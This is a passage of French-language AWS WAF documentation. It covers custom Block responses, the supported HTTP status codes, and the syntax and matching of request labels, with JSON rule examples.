1. **Réponse personnalisée définie dans la ressource protégée** : sinon, si des paramètres de réponse personnalisés sont spécifiés pour la ressource protégée, la ressource protégée utilise ces paramètres pour répondre au client. 

1. **AWS WAF Blockréponse par défaut** — Dans le cas contraire, la ressource protégée répond au client avec la Block réponse AWS WAF par défaut`403 (Forbidden)`. 

Pour les requêtes Web qui le AWS WAF permettent, votre configuration de la ressource protégée détermine la réponse qu'elle renvoie au client. Vous ne pouvez pas configurer les paramètres de réponse AWS WAF pour les demandes autorisées. La seule personnalisation que vous pouvez configurer AWS WAF pour les demandes autorisées est l'insertion d'en-têtes personnalisés dans la demande d'origine, avant de la transmettre à la ressource protégée. Cette option est décrite dans la section précédente,[Insertion d'en-têtes de demande personnalisés pour les actions non bloquantes](customizing-the-incoming-request.md). 

**En-têtes de réponse personnalisés**  
Vous pouvez spécifier n'importe quel nom d'en-tête, à l'exception de`content-type`.

**Organismes de réponse personnalisés**  
Vous définissez le corps d'une réponse personnalisée dans le contexte du pack de protection (ACL Web) ou du groupe de règles dans lequel vous souhaitez l'utiliser. Après avoir défini un corps de réponse personnalisé, vous pouvez l'utiliser par référence à n'importe quel autre endroit du pack de protection (ACL Web) ou du groupe de règles dans lequel vous l'avez créé. Dans les paramètres Block d'action individuels, vous faites référence au corps personnalisé que vous souhaitez utiliser et vous définissez le code d'état et l'en-tête de la réponse personnalisée. 

Lorsque vous créez une réponse personnalisée dans la console, vous pouvez choisir parmi les corps de réponse que vous avez déjà définis ou créer un nouveau corps. En dehors de la console, vous définissez vos corps de réponse personnalisés au niveau du pack de protection (ACL Web) ou du groupe de règles, puis vous les référencez à partir des paramètres d'action du pack de protection (ACL Web) ou du groupe de règles. Cela est illustré dans l'exemple JSON de la section suivante. 

**Exemple de réponse personnalisée**  
L'exemple suivant répertorie le JSON d'un groupe de règles avec des paramètres de réponse personnalisés. Le corps de réponse personnalisé est défini pour l'ensemble du groupe de règles, puis référencé par une touche dans l'action de règle.

```
{
 "ARN": "test_rulegroup_arn",
 "Capacity": 1,
 
 "CustomResponseBodies": {
  "CustomResponseBodyKey1": {
   "Content": "This is a plain text response body.",
   "ContentType": "TEXT_PLAIN"
  }
 },
 
 "Description": "This is a test rule group.",
 "Id": "test_rulegroup_id",
 "Name": "TestRuleGroup",
 
 "Rules": [
  {
   "Action": {
    "Block": {
     "CustomResponse": {
      "CustomResponseBodyKey": "CustomResponseBodyKey1",
      "ResponseCode": 404,
      "ResponseHeaders": [
       {
        "Name": "BlockActionHeader1Name",
        "Value": "BlockActionHeader1Value"
       }
      ]
     }
    }
   },
   "Name": "GeoMatchRule",
   "Priority": 1,
   "Statement": {
    "GeoMatchStatement": {
     "CountryCodes": [
      "US"
     ]
    }
   },
   "VisibilityConfig": {
    "CloudWatchMetricsEnabled": true,
    "MetricName": "TestRuleGroupReferenceMetric",
    "SampledRequestsEnabled": true
   }
  }
 ],
 "VisibilityConfig": {
  "CloudWatchMetricsEnabled": true,
  "MetricName": "TestRuleGroupMetric",
  "SampledRequestsEnabled": true
 }
}
```

# Codes d'état pris en charge pour les réponses personnalisées
<a name="customizing-the-response-status-codes"></a>

Cette section répertorie les codes d'état que vous pouvez utiliser dans une réponse personnalisée. Pour des informations détaillées sur les codes d'état HTTP, voir [Codes d'état](https://www.rfc-editor.org/rfc/rfc9110.html#name-status-codes) de l'Internet Engineering Task Force (IETF) et [Liste des codes de statut HTTP sur Wikipedia](https://en.wikipedia.org/wiki/List_of_HTTP_status_codes).

Les codes d'état HTTP suivants prennent en AWS WAF charge les réponses personnalisées. 
+ `2xx Successful`
  + `200` – `OK`
  + `201` – `Created`
  + `202` – `Accepted` 
  + `204` – `No Content` 
  + `206` – `Partial Content`
+ `3xx Redirection `
  + `300` – `Multiple Choices`
  + `301` – `Moved Permanently`
  + `302` – `Found`
  + `303` –`See Other`
  + `304` – `Not Modified`
  + `307` – `Temporary Redirect`
  + `308` – `Permanent Redirect`
+ `4xx Client Error `
  + `400` – `Bad Request`
  + `401` – `Unauthorized`
  + `403` – `Forbidden`
  + `404` – `Not Found`
  + `405` – `Method Not Allowed`
  + `408` – `Request Timeout`
  + `409` – `Conflict`
  + `411` – `Length Required`
  + `412` – `Precondition Failed`
  + `413` – `Request Entity Too Large`
  + `414` – `Request-URI Too Long`
  + `415` – `Unsupported Media Type`
  + `416` – `Requested Range Not Satisfiable`
  + `421` – `Misdirected Request`
  + `429` – `Too Many Requests`
+ `5xx Server Error`
  + `500` – `Internal Server Error`
  + `501` – `Not Implemented`
  + `502` – `Bad Gateway`
  + `503` – `Service Unavailable`
  + `504` – `Gateway Timeout`
  + `505` – `HTTP Version Not Supported`

# Étiquetage des requêtes Web dans AWS WAF
<a name="waf-labels"></a>

Cette section explique ce que sont les AWS WAF étiquettes.

Une étiquette est une métadonnée ajoutée à une demande Web par une règle lorsque la règle correspond à la demande. Une fois ajoutée, une étiquette reste disponible sur la demande jusqu'à la fin de l'évaluation du pack de protection (ACL Web). Vous pouvez accéder aux étiquettes dans les règles qui s'exécuteront ultérieurement lors de l'évaluation du pack de protection (ACL Web) à l'aide d'une instruction de correspondance des étiquettes. Pour en savoir plus, consultez [Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md). 

Les étiquettes figurant sur les requêtes Web génèrent des statistiques relatives aux CloudWatch étiquettes Amazon. Pour obtenir la liste des mesures et des dimensions, voir[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). Pour plus d'informations sur l'accès aux métriques et aux résumés des métriques via CloudWatch et via la AWS WAF console, consultez[Surveillance et réglage de vos AWS WAF protections](web-acl-testing-activities.md).

**Cas d'utilisation de l'étiquetage**  
Les cas d'utilisation courants des AWS WAF étiquettes sont les suivants : 
+ **Évaluation d'une demande Web par rapport à plusieurs instructions de règle avant d'agir sur la demande** — Une fois qu'une correspondance est trouvée avec une règle dans un pack de protection (ACL Web), AWS WAF continue d'évaluer la demande par rapport au pack de protection (ACL Web) si l'action de règle ne met pas fin à l'évaluation du pack de protection (ACL Web). Vous pouvez utiliser des étiquettes pour évaluer et collecter des informations issues de plusieurs règles avant de décider d'autoriser ou de bloquer la demande. Pour ce faire, modifiez les actions de vos règles existantes Count et configurez-les pour ajouter des étiquettes aux demandes correspondantes. Ajoutez ensuite une ou plusieurs nouvelles règles à exécuter après vos autres règles, puis configurez-les pour évaluer les étiquettes et gérer les demandes en fonction des combinaisons de correspondance des étiquettes. 
+ **Gestion des requêtes Web par région géographique** — Vous pouvez utiliser uniquement la règle de correspondance géographique pour gérer les demandes Web par pays d'origine. Pour affiner l'emplacement au niveau de la région, vous utilisez la règle de correspondance géographique avec une Count action suivie d'une règle de correspondance des étiquettes. Pour plus d'informations sur la règle de correspondance géographique, consultez[Instruction de correspondance géographique de règle](waf-rule-statement-type-geo-match.md). 
+ **Réutilisation de la logique entre plusieurs règles** : si vous devez réutiliser la même logique pour plusieurs règles, vous pouvez utiliser des étiquettes pour obtenir une source unique de la logique et simplement tester les résultats. Lorsque plusieurs règles complexes utilisent un sous-ensemble commun d'instructions de règles imbriquées, la duplication de l'ensemble de règles communes entre vos règles complexes peut prendre du temps et être source d'erreurs. Avec les étiquettes, vous pouvez créer une nouvelle règle avec le sous-ensemble de règles communes qui compte les demandes correspondantes et leur ajoute une étiquette. Vous ajoutez la nouvelle règle à votre pack de protection (ACL Web) afin qu'elle s'exécute avant vos règles complexes d'origine. Ensuite, dans vos règles d'origine, vous remplacez le sous-ensemble de règles partagées par une règle unique qui vérifie l'étiquette. 

  Supposons, par exemple, que vous souhaitiez appliquer plusieurs règles uniquement à vos chemins de connexion. Plutôt que de demander à chaque règle de spécifier la même logique pour correspondre aux chemins de connexion potentiels, vous pouvez implémenter une nouvelle règle unique contenant cette logique. Demandez à la nouvelle règle d'ajouter une étiquette aux demandes correspondantes pour indiquer que la demande se trouve sur un chemin de connexion. Dans votre pack de protection (ACL Web), attribuez à cette nouvelle règle un paramètre de priorité numérique inférieur à celui de vos règles d'origine afin qu'elle s'exécute en premier. Ensuite, dans vos règles d'origine, remplacez la logique partagée par une vérification de la présence de l'étiquette. Pour plus d'informations sur les paramètres de priorité, voir[Définition de la priorité des règles](web-acl-processing-order.md). 
+ **Création d'exceptions aux règles dans les groupes** de règles : cette option est particulièrement utile pour les groupes de règles gérés, que vous ne pouvez ni afficher ni modifier. De nombreuses règles de groupes de règles gérés ajoutent des étiquettes aux requêtes Web correspondantes, pour indiquer les règles correspondantes et éventuellement pour fournir des informations supplémentaires sur la correspondance. Lorsque vous utilisez un groupe de règles qui ajoute des étiquettes aux demandes, vous pouvez remplacer les règles du groupe de règles pour compter les correspondances, puis exécuter une règle après le groupe de règles qui gère la demande Web en fonction des étiquettes du groupe de règles. Toutes les règles AWS gérées ajoutent des étiquettes aux requêtes Web correspondantes. Pour plus de détails, consultez les descriptions des règles à l'adresse[AWS Liste des groupes de règles gérées](aws-managed-rule-groups-list.md). 
+ **Utilisation des métriques d'étiquette pour surveiller les modèles de trafic** : vous pouvez accéder aux métriques relatives aux étiquettes que vous ajoutez par le biais de vos règles et aux métriques ajoutées par les groupes de règles gérés que vous utilisez dans votre pack de protection (ACL Web). Tous les groupes de règles AWS gérées ajoutent des étiquettes aux requêtes Web qu'ils évaluent. Pour obtenir la liste des mesures et des dimensions des étiquettes, consultez[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). Vous pouvez accéder aux métriques et aux résumés des métriques par le biais CloudWatch de la page du pack de protection (ACL Web) de la AWS WAF console. Pour plus d'informations, consultez [Surveillance et réglage de vos AWS WAF protections](web-acl-testing-activities.md). 

# Comment fonctionne l'étiquetage dans AWS WAF
<a name="waf-rule-label-overview"></a>

Cette section explique le fonctionnement AWS WAF des étiquettes.

Lorsqu'une règle correspond à une demande Web, si des étiquettes sont définies pour la règle, AWS WAF ajoute les étiquettes à la demande à la fin de l'évaluation de la règle. Les règles évaluées après la règle correspondante dans le pack de protection (ACL Web) peuvent correspondre aux étiquettes ajoutées par la règle. 

**Qui ajoute des libellés aux demandes**  
Les composants du pack de protection (ACL Web) qui évaluent les demandes peuvent ajouter des étiquettes aux demandes. 
+ Toute règle qui n'est pas une déclaration de référence de groupe de règles peut ajouter des étiquettes aux requêtes Web correspondantes. Les critères d'étiquetage font partie de la définition de la règle, et lorsqu'une requête Web correspond à la règle, AWS WAF ajoute les étiquettes de la règle à la demande. Pour plus d'informations, consultez [AWS WAF règles qui ajoutent des étiquettes](waf-rule-label-add.md).
+ L'instruction de règle de correspondance géographique ajoute des libellés de pays et de région à toutes les demandes qu'elle inspecte, que la déclaration aboutisse ou non à une correspondance. Pour plus d'informations, consultez [Instruction de correspondance géographique de règle](waf-rule-statement-type-geo-match.md).
+ Les règles AWS gérées pour AWS WAF tous ajoutent des étiquettes aux demandes qu'ils inspectent. Ils ajoutent des étiquettes en fonction des correspondances de règles dans le groupe de règles et d'autres en fonction des AWS processus utilisés par les groupes de règles gérés, tels que l'étiquetage jeton ajouté lorsque vous utilisez un groupe de règles d'atténuation intelligente des menaces. Pour plus d'informations sur les étiquettes ajoutées par chaque groupe de règles géré, consultez[AWS Liste des groupes de règles gérées](aws-managed-rule-groups-list.md).

**Comment AWS WAF gère les étiquettes**  
AWS WAF ajoute les libellés de la règle à la demande à la fin de l'inspection de la demande par la règle. L'étiquetage fait partie des activités de correspondance d'une règle, tout comme l'action. 

Les libellés ne sont pas conservés dans la requête Web une fois l'évaluation du pack de protection (ACL Web) terminée. Pour que les autres règles correspondent à une étiquette ajoutée par votre règle, votre action de règle ne doit pas mettre fin à l'évaluation de la requête Web par le pack de protection (ACL Web). L'action de la règle doit être définie sur CountCAPTCHA, ouChallenge. Lorsque l'évaluation du pack de protection (ACL Web) n'est pas terminée, les règles suivantes du pack de protection (ACL Web) peuvent exécuter leurs critères de correspondance d'étiquette par rapport à la demande. Pour plus d'informations sur les actions de règle, consultez [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). 

**Accès aux étiquettes lors de l'évaluation du pack de protection (ACL Web)**  
Une fois ajoutées, les étiquettes restent disponibles sur la demande tant que la demande AWS WAF est évaluée par rapport au pack de protection (ACL Web). Toute règle d'un pack de protection (ACL Web) peut accéder aux étiquettes ajoutées par les règles déjà exécutées dans le même pack de protection (ACL Web). Cela inclut les règles définies directement dans le pack de protection (ACL Web) et les règles définies dans les groupes de règles utilisés dans le pack de protection (ACL Web). 
+ Vous pouvez effectuer une comparaison avec une étiquette figurant dans les critères d'inspection des demandes de votre règle à l'aide de l'instruction de correspondance des étiquettes. Vous pouvez faire correspondre n'importe quelle étiquette attachée à la demande. Pour plus de détails sur le relevé, voir[Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md). 
+ L'instruction de correspondance géographique ajoute des étiquettes avec ou sans correspondance, mais elles ne sont disponibles qu'une fois que la règle contenant le pack de protection (ACL Web) de l'instruction a terminé l'évaluation de la demande. 
  + Vous ne pouvez pas utiliser une seule règle, par exemple une `AND` instruction logique, pour exécuter une instruction de correspondance géographique suivie d'une instruction de correspondance d'étiquettes par rapport aux étiquettes géographiques. Vous devez placer l'instruction label match dans une règle distincte qui s'exécute après la règle contenant l'instruction Geo Match. 
  + Si vous utilisez une instruction de correspondance géographique comme instruction de délimitation dans une déclaration de règle basée sur le taux ou une déclaration de référence à un groupe de règles géré, les étiquettes ajoutées par l'instruction de correspondance géographique ne peuvent pas être inspectées par l'instruction de la règle qui les contient. Si vous devez inspecter l'étiquetage géographique dans une déclaration de règle basée sur les taux ou dans un groupe de règles, vous devez exécuter l'instruction de correspondance géographique dans une règle distincte qui s'exécute au préalable. 

**Accès aux informations d'étiquette en dehors de l'évaluation du pack de protection (ACL Web)**  
Les étiquettes ne sont pas conservées dans la requête Web une fois l'évaluation du pack de protection (ACL Web) terminée, mais elles AWS WAF enregistrent les informations relatives aux étiquettes dans les journaux et dans les métriques. 
+ AWS WAF stocke les CloudWatch statistiques Amazon pour les 100 premières étiquettes sur chaque demande. Pour plus d'informations sur l'accès aux métriques relatives aux étiquettes, reportez-vous aux [Surveillance avec Amazon CloudWatch](monitoring-cloudwatch.md) sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label).
+ AWS WAF résume les métriques CloudWatch d'étiquette dans les tableaux de bord d'aperçu du trafic du pack de protection (ACL Web) de la AWS WAF console. Vous pouvez accéder aux tableaux de bord sur n'importe quelle page du pack de protection (ACL Web). Pour de plus amples informations, veuillez consulter [Tableaux de bord d'aperçu du trafic pour les packs de protection (Web ACLs)](web-acl-dashboards.md).
+ AWS WAF enregistre les étiquettes dans les journaux pour les 100 premières étiquettes sur demande. Vous pouvez utiliser des étiquettes, ainsi que l'action des règles, pour filtrer les journaux qui AWS WAF enregistrent. Pour plus d'informations, consultez [Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md).

L'évaluation de votre pack de protection (ACL Web) peut appliquer plus de 100 étiquettes à une requête Web et la comparer à plus de 100 étiquettes, mais AWS WAF n'enregistre que les 100 premières dans les journaux et les mesures. 

# Syntaxe des étiquettes et exigences de dénomination dans AWS WAF
<a name="waf-rule-label-requirements"></a>

Cette section explique comment créer une AWS WAF étiquette et la comparer à celle-ci.

Une étiquette est une chaîne composée d'un préfixe, d'espaces de noms facultatifs et d'un nom. Les composants d'une étiquette sont délimités par deux points. Les étiquettes présentent les exigences et caractéristiques suivantes :
+ Les étiquettes distinguent les majuscules et minuscules. 
+ Chaque espace de noms d'étiquette ou nom d'étiquette peut comporter jusqu'à 128 caractères. 
+ Vous pouvez spécifier jusqu'à cinq espaces de noms dans une étiquette. 
+ Les composants d'une étiquette sont séparés par deux points (`:`).
+ Vous ne pouvez pas utiliser les chaînes réservées suivantes dans les espaces de noms ou le nom que vous spécifiez pour une étiquette : `awswaf` `aws``waf`,,`rulegroup`,`webacl`, `regexpatternset``ipset`, et`managed`.

## Syntaxe des étiquettes
<a name="waf-rule-label-syntax"></a>

Une étiquette entièrement qualifiée possède un préfixe, des espaces de noms facultatifs et un nom d'étiquette. Le préfixe identifie le contexte du groupe de règles ou du pack de protection (ACL Web) de la règle qui a ajouté l'étiquette. Les espaces de noms peuvent être utilisés pour ajouter du contexte à l'étiquette. Le nom de l'étiquette fournit le niveau de détail le plus bas pour une étiquette. Il indique souvent la règle spécifique qui a ajouté l'étiquette à la demande. 

Le préfixe de l'étiquette varie en fonction de son origine. 
+ **Vos étiquettes** : voici la syntaxe complète des étiquettes que vous créez dans votre pack de protection (ACL Web) et les règles des groupes de règles. Les types d'entités sont `rulegroup` et`webacl`.

  ```
  awswaf:<entity owner account id>:<entity type>:<entity name>:<custom namespace>:...:<label name>
  ```
  + Préfixe de l'espace de noms de l'étiquette : `awswaf:<entity owner account id>:<entity type>:<entity name>:`
  + Ajouts d'espaces de noms personnalisés : `<custom namespace>:…:`

  Lorsque vous définissez une étiquette pour une règle dans un groupe de règles ou un pack de protection (ACL Web), vous contrôlez les chaînes d'espace de noms personnalisées et le nom de l'étiquette. Le reste est généré pour vous par AWS WAF. AWS WAF préfixe automatiquement toutes les étiquettes avec `awswaf` les paramètres du compte et du pack de protection (ACL Web) ou des entités du groupe de règles.
+ **Étiquettes de groupes de règles gérés** : ce qui suit montre la syntaxe complète des étiquettes créées par des règles dans des groupes de règles gérés. 

  ```
  awswaf:managed:<vendor>:<rule group name>:<custom namespace>:...:<label name>
  ```
  + Préfixe de l'espace de noms de l'étiquette : `awswaf:managed:<vendor>:<rule group name>:`
  + Ajouts d'espaces de noms personnalisés : `<custom namespace>:…:`

  Tous les groupes de règles de règles AWS gérées ajoutent des libellés. Pour de plus amples informations sur les groupes de règles gérées, reportez-vous à la section [Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md). 
+ **Étiquettes provenant d'autres AWS processus** : ces processus sont utilisés par les groupes de règles AWS gérées. Ils sont donc ajoutés aux demandes Web que vous évaluez à l'aide de groupes de règles gérés. Vous trouverez ci-dessous la syntaxe complète des étiquettes créées par des processus appelés par des groupes de règles gérés. 

  ```
  awswaf:managed:<process>:<custom namespace>:...:<label name>
  ```
  + Préfixe de l'espace de noms de l'étiquette : `awswaf:managed:<process>:`
  + Ajouts d'espaces de noms personnalisés : `<custom namespace>:…:`

  Les étiquettes de ce type sont répertoriées pour les groupes de règles gérés qui appellent le AWS processus. Pour de plus amples informations sur les groupes de règles gérées, reportez-vous à la section [Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md). 

## Exemples d'étiquettes pour vos règles
<a name="waf-rule-label-examples-rules"></a>

Les exemples d'étiquettes suivants sont définis par les règles d'un groupe de règles nommé `testRules` qui appartient au compte, 111122223333. 

```
awswaf:111122223333:rulegroup:testRules:testNS1:testNS2:LabelNameA
```

```
awswaf:111122223333:rulegroup:testRules:testNS1:LabelNameQ
```

```
awswaf:111122223333:rulegroup:testRules:LabelNameZ
```

La liste suivante présente un exemple de spécification d'étiquette au format JSON. Ces noms d'étiquette incluent des chaînes d'espace de noms personnalisées avant le nom d'étiquette de fin. 

```
Rule: {
    Name: "label_rule",
    Statement: {...}
    RuleLabels: [
        Name: "header:encoding:utf8",
        Name: "header:user_agent:firefox"
    ],
    Action: { Count: {} }
}
```

**Note**  
Vous pouvez accéder à ce type de liste dans la console via l'éditeur JSON de règles. 

Si vous exécutez la règle précédente dans le même groupe de règles et le même compte que les exemples d'étiquettes précédents, les étiquettes complètes obtenues seront les suivantes : 

```
awswaf:111122223333:rulegroup:testRules:header:encoding:utf8
```

```
awswaf:111122223333:rulegroup:testRules:header:user_agent:firefox
```

## Exemples d'étiquettes pour les groupes de règles gérés
<a name="waf-rule-label-examples-rule-groups"></a>

Vous trouverez ci-dessous des exemples d'étiquettes provenant des groupes de règles AWS Managed Rules et des processus qu'ils invoquent.

```
awswaf:managed:aws:core-rule-set:NoUserAgent_Header
```

```
awswaf:managed:aws:sql-database:SQLiExtendedPatterns_QueryArguments
```

```
awswaf:managed:aws:atp:aggregate:attribute:compromised_credentials
```

```
awswaf:managed:token:accepted
```

# AWS WAF règles qui ajoutent des étiquettes
<a name="waf-rule-label-add"></a>

Dans presque toutes les règles, vous pouvez définir des étiquettes et AWS WAF les appliquer à toute demande correspondante. 

Les types de règles suivants constituent les seules exceptions : 
+ **Les règles basées sur le taux n'étiquettent que lorsque le débit est limité** : les règles basées sur le taux ajoutent uniquement des étiquettes aux demandes Web pour une instance d'agrégation spécifique lorsque cette instance est limitée par. AWS WAF Pour plus d'informations sur les règles basées sur les taux, consultez[Utilisation d'instructions de règles basées sur le taux dans AWS WAF](waf-rule-statement-type-rate-based.md). 
+ **L'étiquetage n'est pas autorisé dans les instructions de référence des groupes de règles** : la console n'accepte pas les libellés pour les instructions de groupes de règles ou les instructions de groupes de règles gérés. Par le biais de l'API, la spécification d'une étiquette pour l'un ou l'autre type d'instruction entraîne une exception de validation. Pour plus d'informations sur ces types d'instructions, reportez-vous [Utilisation des instructions de groupes de règles gérés dans AWS WAF](waf-rule-statement-type-managed-rule-group.md) aux sections et[Utilisation des instructions de groupe de règles dans AWS WAF](waf-rule-statement-type-rule-group.md).

**WCUs **— 1 WCU pour 5 étiquettes que vous définissez dans votre pack de protection (ACL Web) ou dans les règles de groupe de règles. 

**Où chercher**
+ **Générateur de règles** sur la console : dans les paramètres **d'action** de la règle, sous **Label**. 
+ **Type de données d'API** — `Rule` `RuleLabels`

Vous définissez une étiquette dans une règle en spécifiant les chaînes d'espace de nommage personnalisées et le nom à ajouter au préfixe d'espace de nommage de l'étiquette. AWS WAF dérive le préfixe du contexte dans lequel vous définissez la règle. Pour plus d'informations à ce sujet, consultez les informations sur la syntaxe des étiquettes sous[Syntaxe des étiquettes et exigences de dénomination dans AWS WAF](waf-rule-label-requirements.md). 

# AWS WAF règles qui correspondent aux libellés
<a name="waf-rule-label-match"></a>

Cette section explique comment utiliser une instruction de correspondance d'étiquettes pour évaluer les étiquettes des requêtes Web. Vous pouvez effectuer une comparaison avec *Label*, qui nécessite le nom de l'étiquette, ou avec *Namespace*, qui nécessite une spécification d'espace de noms. Pour l'étiquette ou l'espace de noms, vous pouvez éventuellement inclure les espaces de noms précédents et le préfixe dans votre spécification. Pour des informations générales sur ce type d'instruction, consultez[Déclaration relative à la règle de correspondance des étiquettes](waf-rule-statement-type-label-match.md). 

Le préfixe d'une étiquette définit le contexte du groupe de règles ou du pack de protection (ACL Web) dans lequel la règle de l'étiquette est définie. Dans l'instruction de correspondance d'étiquette d'une règle, si votre chaîne de correspondance d'étiquette ou d'espace de noms ne spécifie pas le préfixe, AWS WAF utilise le préfixe de la règle de correspondance d'étiquette. 
+ Les étiquettes des règles définies directement dans un pack de protection (ACL Web) ont un préfixe qui spécifie le contexte du pack de protection (ACL Web). 
+ Les libellés des règles faisant partie d'un groupe de règles comportent un préfixe qui indique le contexte du groupe de règles. Il peut s'agir de votre propre groupe de règles ou d'un groupe de règles géré pour vous. 

Pour plus d'informations à ce sujet, voir la syntaxe des étiquettes sous[Syntaxe des étiquettes et exigences de dénomination dans AWS WAF](waf-rule-label-requirements.md). 

**Note**  
Certains groupes de règles gérés ajoutent des libellés. Vous pouvez les récupérer via l'API en appelant`DescribeManagedRuleGroup`. Les étiquettes sont répertoriées dans la `AvailableLabels` propriété de la réponse.

Si vous souhaitez effectuer une comparaison avec une règle située dans un contexte différent de celui de votre règle, vous devez fournir le préfixe dans votre chaîne de correspondance. Par exemple, si vous souhaitez effectuer une comparaison avec les libellés ajoutés par les règles d'un groupe de règles géré, vous pouvez ajouter une règle dans votre pack de protection (ACL Web) avec une instruction de correspondance d'étiquette dont la chaîne de correspondance indique le préfixe du groupe de règles suivi de vos critères de correspondance supplémentaires. 

Dans la chaîne de correspondance pour l'instruction label match, vous spécifiez une étiquette ou un espace de noms : 
+ **Étiquette** — La spécification de l'étiquette pour une correspondance comprend la partie terminale de l'étiquette. Vous pouvez inclure n'importe quel nombre d'espaces de noms contigus qui précèdent immédiatement le nom de l'étiquette suivi du nom. Vous pouvez également fournir l'étiquette entièrement qualifiée en commençant la spécification par le préfixe. 

  Exemples de spécifications :
  + `testNS1:testNS2:LabelNameA`
  + `awswaf:managed:aws:managed-rule-set:testNS1:testNS2:LabelNameA`
+ **Espace de noms** — La spécification d'espace de noms pour une correspondance comprend tout sous-ensemble contigu de la spécification de l'étiquette, à l'exception du nom. Vous pouvez inclure le préfixe et inclure une ou plusieurs chaînes d'espace de noms. 

  Exemples de spécifications : 
  + `testNS1:testNS2:`
  + `awswaf:managed:aws:managed-rule-set:testNS1:`

# AWS WAF exemples de correspondance d'étiquettes
<a name="waf-rule-label-match-examples"></a>

Cette section fournit des exemples de spécifications de correspondance, pour l'instruction de règle de correspondance des étiquettes. 

**Note**  
Ces listes JSON ont été créées dans la console en ajoutant une règle à un pack de protection (ACL Web) avec les spécifications de correspondance des étiquettes, puis en modifiant la règle et en passant à l'**éditeur Rule JSON**. Vous pouvez également obtenir le code JSON d'un groupe de règles ou d'un pack de protection (ACL Web) via l' APIs interface de ligne de commande. 

**Topics**
+ [Match contre un label local](#waf-rule-label-match-examples-local-label)
+ [Correspondance avec une étiquette provenant d'un autre contexte](#waf-rule-label-match-examples-label)
+ [Correspondance avec une étiquette de groupe de règles géré](#waf-rule-label-match-examples-mgd-rg-label)
+ [Correspondance avec un espace de noms local](#waf-rule-label-match-examples-local-namespace)
+ [Correspondance avec un espace de noms de groupe de règles géré](#waf-rule-label-match-examples-mgd-rg-namespace)

## Match contre un label local
<a name="waf-rule-label-match-examples-local-label"></a>

La liste JSON suivante montre une instruction de correspondance d'étiquette pour une étiquette ajoutée localement à la requête Web, dans le même contexte que cette règle.

```
Rule: {
    Name: "match_rule",
    Statement: {
        LabelMatchStatement: {
            Scope: "LABEL",
            Key: "header:encoding:utf8"
        }
    },
    RuleLabels: [
        ...generate_more_labels...
    ],
    Action: { Block: {} }
}
```

Si vous utilisez cette instruction de correspondance dans le compte 111122223333, dans une règle que vous définissez pour le pack de protection (ACL Web)`testWebACL`, elle correspondra aux libellés suivants. 

```
awswaf:111122223333:webacl:testWebACL:header:encoding:utf8
```

```
awswaf:111122223333:webacl:testWebACL:testNS1:testNS2:header:encoding:utf8
```

Elle ne correspondrait pas à l'étiquette suivante, car la chaîne d'étiquette ne correspond pas exactement.

```
awswaf:111122223333:webacl:testWebACL:header:encoding2:utf8
```

Il ne correspondrait pas à l'étiquette suivante, car le contexte n'est pas le même, donc le préfixe ne correspond pas. Cela est vrai même si vous avez ajouté le groupe de règles `productionRules` au pack de protection (ACL Web)`testWebACL`, dans lequel la règle est définie. 

```
awswaf:111122223333:rulegroup:productionRules:header:encoding:utf8
```

## Correspondance avec une étiquette provenant d'un autre contexte
<a name="waf-rule-label-match-examples-label"></a>

La liste JSON suivante montre une règle de correspondance d'étiquette qui correspond à une étiquette d'une règle au sein d'un groupe de règles créé par l'utilisateur. Le préfixe est obligatoire dans la spécification pour toutes les règles exécutées dans le pack de protection (ACL Web) qui ne font pas partie du groupe de règles nommé. Cet exemple de spécification d'étiquette correspond uniquement à l'étiquette exacte. 

```
Rule: {
    Name: "match_rule",
    Statement: {
        LabelMatchStatement: {
            Scope: "LABEL",
            Key: "awswaf:111122223333:rulegroup:testRules:header:encoding:utf8"
        }
    },
    RuleLabels: [
        ...generate_more_labels...
    ],
    Action: { Block: {} }
}
```

## Correspondance avec une étiquette de groupe de règles géré
<a name="waf-rule-label-match-examples-mgd-rg-label"></a>

Il s'agit d'un cas particulier de correspondance avec une étiquette provenant d'un autre contexte que celui de la règle de correspondance. La liste JSON suivante montre une instruction de correspondance d'étiquette pour une étiquette de groupe de règles géré. Cela correspond uniquement à l'étiquette exacte spécifiée dans le paramètre clé de l'instruction label match.

```
Rule: {
    Name: "match_rule",
    Statement: {
        LabelMatchStatement: {
            Scope: "LABEL",
            Key: "awswaf:managed:aws:managed-rule-set:header:encoding:utf8"
        }
    },
    RuleLabels: [
        ...generate_more_labels...
    ],
    Action: { Block: {} }
}
```

## Correspondance avec un espace de noms local
<a name="waf-rule-label-match-examples-local-namespace"></a>

La liste JSON suivante montre une instruction label match pour un espace de noms local.

```
Rule: {
    Name: "match_rule",
    Statement: {
        LabelMatchStatement: {
            Scope: "NAMESPACE",
            Key: "header:encoding:"
        }
    },
    Labels: [
        ...generate_more_labels...
    ],
    Action: { Block: {} }
}
```

Comme pour la `Label` correspondance locale, si vous utilisez cette instruction dans le compte 111122223333, dans une règle que vous définissez pour le pack de protection (ACL Web)`testWebACL`, elle correspondra à l'étiquette suivante. 

```
awswaf:111122223333:webacl:testWebACL:header:encoding:utf8
```

Il ne correspondrait pas à l'étiquette suivante, car le compte n'est pas le même, donc le préfixe ne correspond pas. 

```
awswaf:444455556666:webacl:testWebACL:header:encoding:utf8
```

Le préfixe ne correspond pas non plus aux libellés appliqués par les groupes de règles gérés, comme indiqué ci-dessous. 

```
awswaf:managed:aws:managed-rule-set:header:encoding:utf8
```

## Correspondance avec un espace de noms de groupe de règles géré
<a name="waf-rule-label-match-examples-mgd-rg-namespace"></a>

La liste JSON suivante montre une instruction de correspondance d'étiquette pour un espace de noms de groupe de règles géré. Pour un groupe de règles dont vous êtes le propriétaire, vous devez également fournir le préfixe afin de correspondre à un espace de noms situé en dehors du contexte de la règle. 

```
Rule: {
    Name: "match_rule",
    Statement: {
        LabelMatchStatement: {
            Scope: "NAMESPACE",
            Key: "awswaf:managed:aws:managed-rule-set:header:"
        }
    },
    RuleLabels: [
        ...generate_more_labels...
    ],
    Action: { Block: {} }
}
```

Cette spécification correspond aux exemples d'étiquettes suivants. 

```
awswaf:managed:aws:managed-rule-set:header:encoding:utf8
```

```
awswaf:managed:aws:managed-rule-set:header:encoding:unicode
```

